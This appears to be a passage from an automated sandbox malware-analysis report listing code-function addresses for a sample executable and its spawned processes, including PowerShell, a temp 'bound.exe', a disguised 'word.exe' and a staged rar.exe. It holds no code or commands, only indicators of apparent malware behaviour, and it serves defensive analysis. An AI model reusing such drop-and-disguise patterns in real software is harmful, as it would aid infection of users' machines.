                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448880E40_2_00007FF6448880E4
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448918740_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448940AC0_2_00007FF6448940AC
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448819440_2_00007FF644881944
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448821640_2_00007FF644882164
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448839A40_2_00007FF6448839A4
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487A2DB0_2_00007FF64487A2DB
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64488DA5C0_2_00007FF64488DA5C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644893C100_2_00007FF644893C10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644882C100_2_00007FF644882C10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644895C000_2_00007FF644895C00
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448908C80_2_00007FF6448908C8
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448964180_2_00007FF644896418
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644881B500_2_00007FF644881B50
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644885D300_2_00007FF644885D30
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487A47B0_2_00007FF64487A47B
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487ACAD0_2_00007FF64487ACAD
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448710001_2_00007FF644871000
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448969641_2_00007FF644896964
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644881D541_2_00007FF644881D54
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64488E5701_2_00007FF64488E570
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448835A01_2_00007FF6448835A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64488DEF01_2_00007FF64488DEF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448997281_2_00007FF644899728
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644895E7C1_2_00007FF644895E7C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644889EA01_2_00007FF644889EA0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448798001_2_00007FF644879800
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448817401_2_00007FF644881740
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644881F601_2_00007FF644881F60
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448887941_2_00007FF644888794
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448908C81_2_00007FF6448908C8
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448880E41_2_00007FF6448880E4
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448918741_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448940AC1_2_00007FF6448940AC
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448789E01_2_00007FF6448789E0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448819441_2_00007FF644881944
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448821641_2_00007FF644882164
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448839A41_2_00007FF6448839A4
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487A2DB1_2_00007FF64487A2DB
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64488DA5C1_2_00007FF64488DA5C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644893C101_2_00007FF644893C10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644882C101_2_00007FF644882C10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644895C001_2_00007FF644895C00
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448908C81_2_00007FF6448908C8
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448964181_2_00007FF644896418
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644881B501_2_00007FF644881B50
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644885D301_2_00007FF644885D30
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487A47B1_2_00007FF64487A47B
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487ACAD1_2_00007FF64487ACAD
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF85518801_2_00007FFDF8551880
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF85512F01_2_00007FFDF85512F0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAE9F1601_2_00007FFDFAE9F160
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF54D901_2_00007FFDFAF54D90
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE92601_2_00007FFDFAEE9260
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEF22101_2_00007FFDFAEF2210
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF3BBD01_2_00007FFDFAF3BBD0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF34BF01_2_00007FFDFAF34BF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF26C101_2_00007FFDFAF26C10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEECBF01_2_00007FFDFAEECBF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED3BF01_2_00007FFDFAED3BF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED9B801_2_00007FFDFAED9B80
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE68E01_2_00007FFDFAEE68E0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF32A201_2_00007FFDFAF32A20
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED286E1_2_00007FFDFAED286E
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF478601_2_00007FFDFAF47860
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF158901_2_00007FFDFAF15890
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF428B61_2_00007FFDFAF428B6
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF3C9101_2_00007FFDFAF3C910
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEDF9A01_2_00007FFDFAEDF9A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEF99801_2_00007FFDFAEF9980
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF6CFF01_2_00007FFDFAF6CFF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF4D0301_2_00007FFDFAF4D030
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF14E801_2_00007FFDFAF14E80
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEF70201_2_00007FFDFAEF7020
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEF80001_2_00007FFDFAEF8000
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF2BD801_2_00007FFDFAF2BD80
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF82D901_2_00007FFDFAF82D90
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF68DD01_2_00007FFDFAF68DD0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF5ADD01_2_00007FFDFAF5ADD0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEDBCC01_2_00007FFDFAEDBCC0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE9CB01_2_00007FFDFAEE9CB0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF0CC791_2_00007FFDFAF0CC79
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF2CD001_2_00007FFDFAF2CD00
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEFDD901_2_00007FFDFAEFDD90
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE0D701_2_00007FFDFAEE0D70
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEEC3301_2_00007FFDFAEEC330
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED73161_2_00007FFDFAED7316
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEFD2F01_2_00007FFDFAEFD2F0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEFF2E01_2_00007FFDFAEFF2E0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED32D51_2_00007FFDFAED32D5
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF374201_2_00007FFDFAF37420
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF5A4301_2_00007FFDFAF5A430
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF944401_2_00007FFDFAF94440
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF1F3401_2_00007FFDFAF1F340
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF851801_2_00007FFDFAF85180
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED41001_2_00007FFDFAED4100
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEED2501_2_00007FFDFAEED250
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF5C0F01_2_00007FFDFAF5C0F0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE21901_2_00007FFDFAEE2190
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF307901_2_00007FFDFAF30790
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEDA8501_2_00007FFDFAEDA850
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF2B6701_2_00007FFDFAF2B670
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED48001_2_00007FFDFAED4800
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF2E7401_2_00007FFDFAF2E740
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED45501_2_00007FFDFAED4550
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAED94C01_2_00007FFDFAED94C0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF756301_2_00007FFDFAF75630
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF444801_2_00007FFDFAF44480
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE36001_2_00007FFDFAEE3600
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF015A01_2_00007FFDFAF015A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEFE5A01_2_00007FFDFAEFE5A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAF1A5401_2_00007FFDFAF1A540
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEF45601_2_00007FFDFAEF4560
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFB705B801_2_00007FFDFB705B80
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF1D57701_2_00007FFDFF1D5770
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF191D8E1_2_00007FFDFF191D8E
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF191EDD1_2_00007FFDFF191EDD
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF1B5CF01_2_00007FFDFF1B5CF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF191CBC1_2_00007FFDFF191CBC
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF209B301_2_00007FFDFF209B30
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF191AD71_2_00007FFDFF191AD7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9A99302713_2_00007FFD9A993027
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00007FFD9A8D12E915_2_00007FFD9A8D12E9
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00007FFD9A8DD6E915_2_00007FFD9A8DD6E9
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00007FFD9A8DEA9415_2_00007FFD9A8DEA94
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00007FFD9A8D72D615_2_00007FFD9A8D72D6
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00007FFD9A8D808215_2_00007FFD9A8D8082
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 47_2_00007FFD9A8B12E947_2_00007FFD9A8B12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 47_2_00007FFD9A8B0E9847_2_00007FFD9A8B0E98
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 81_2_00007FFD9A8F12E981_2_00007FFD9A8F12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 81_2_00007FFD9A8F0E9881_2_00007FFD9A8F0E98
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BAE1084_2_00007FF71F0BAE10
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C7B2484_2_00007FF71F0C7B24
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09ABA084_2_00007FF71F09ABA0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A0A2C84_2_00007FF71F0A0A2C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09188484_2_00007FF71F091884
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09B54084_2_00007FF71F09B540
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A54C084_2_00007FF71F0A54C0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0982F084_2_00007FF71F0982F0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A118084_2_00007FF71F0A1180
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A303084_2_00007FF71F0A3030
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C804084_2_00007FF71F0C8040
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C007484_2_00007FF71F0C0074
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BC05C84_2_00007FF71F0BC05C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F00F084_2_00007FF71F0F00F0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B010484_2_00007FF71F0B0104
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C5F4C84_2_00007FF71F0C5F4C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0FAF9084_2_00007FF71F0FAF90
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D4FE884_2_00007FF71F0D4FE8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0FDFD884_2_00007FF71F0FDFD8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CC00C84_2_00007FF71F0CC00C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0DAE5084_2_00007FF71F0DAE50
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0EFE7484_2_00007FF71F0EFE74
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A8E6884_2_00007FF71F0A8E68
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09CE8484_2_00007FF71F09CE84
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0DEEA484_2_00007FF71F0DEEA4
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CAF0C84_2_00007FF71F0CAF0C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F099EFC84_2_00007FF71F099EFC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C0D2084_2_00007FF71F0C0D20
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D9D7484_2_00007FF71F0D9D74
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E1DCC84_2_00007FF71F0E1DCC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09EE0884_2_00007FF71F09EE08
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A1E0484_2_00007FF71F0A1E04
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A8C3084_2_00007FF71F0A8C30
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D5C8C84_2_00007FF71F0D5C8C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E6D0C84_2_00007FF71F0E6D0C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B9D0C84_2_00007FF71F0B9D0C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09DD0484_2_00007FF71F09DD04
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D4B3884_2_00007FF71F0D4B38
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E9B9884_2_00007FF71F0E9B98
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D5A7084_2_00007FF71F0D5A70
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CFA6C84_2_00007FF71F0CFA6C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0FAAC084_2_00007FF71F0FAAC0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09CB1484_2_00007FF71F09CB14
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CD91C84_2_00007FF71F0CD91C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BD97C84_2_00007FF71F0BD97C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0949B884_2_00007FF71F0949B8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D69FD84_2_00007FF71F0D69FD
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A289084_2_00007FF71F0A2890
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09888484_2_00007FF71F098884
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E18A884_2_00007FF71F0E18A8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C38E884_2_00007FF71F0C38E8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D190C84_2_00007FF71F0D190C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C090484_2_00007FF71F0C0904
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A17C884_2_00007FF71F0A17C8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B67E084_2_00007FF71F0B67E0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E766084_2_00007FF71F0E7660
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F86D484_2_00007FF71F0F86D4
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A86C484_2_00007FF71F0A86C4
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CA71084_2_00007FF71F0CA710
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D071084_2_00007FF71F0D0710
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D270084_2_00007FF71F0D2700
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BF5B084_2_00007FF71F0BF5B0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0CF59C84_2_00007FF71F0CF59C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A859884_2_00007FF71F0A8598
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E260C84_2_00007FF71F0E260C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C65FC84_2_00007FF71F0C65FC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D546884_2_00007FF71F0D5468
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BD45884_2_00007FF71F0BD458
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09A50484_2_00007FF71F09A504
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E832C84_2_00007FF71F0E832C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0C037484_2_00007FF71F0C0374
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0A236084_2_00007FF71F0A2360
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0BC3E084_2_00007FF71F0BC3E0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0AE21C84_2_00007FF71F0AE21C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F09F24C84_2_00007FF71F09F24C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B724484_2_00007FF71F0B7244
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E226884_2_00007FF71F0E2268
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D02A484_2_00007FF71F0D02A4
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0AD2C084_2_00007FF71F0AD2C0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0942E084_2_00007FF71F0942E0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0E131484_2_00007FF71F0E1314
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D216484_2_00007FF71F0D2164
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D81CC84_2_00007FF71F0D81CC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F41CC84_2_00007FF71F0F41CC
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 85_2_00007FFD9A8E12E985_2_00007FFD9A8E12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 85_2_00007FFD9A8E0E9885_2_00007FFD9A8E0E98
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 105_2_00007FFD9A8B12E9105_2_00007FFD9A8B12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 105_2_00007FFD9A8B0E98105_2_00007FFD9A8B0E98
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 107_2_00007FFD9A8E12E9107_2_00007FFD9A8E12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 107_2_00007FFD9A8E0E98107_2_00007FFD9A8E0E98
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 110_2_00007FFD9A8C12E9110_2_00007FFD9A8C12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 110_2_00007FFD9A8C0E98110_2_00007FFD9A8C0E98
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 111_2_00007FFD9A8F12E9111_2_00007FFD9A8F12E9
                      Source: C:\Users\user\AppData\Roaming\word.exeCode function: 111_2_00007FFD9A8F0E98111_2_00007FFD9A8F0E98
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FF644872710 appears 104 times
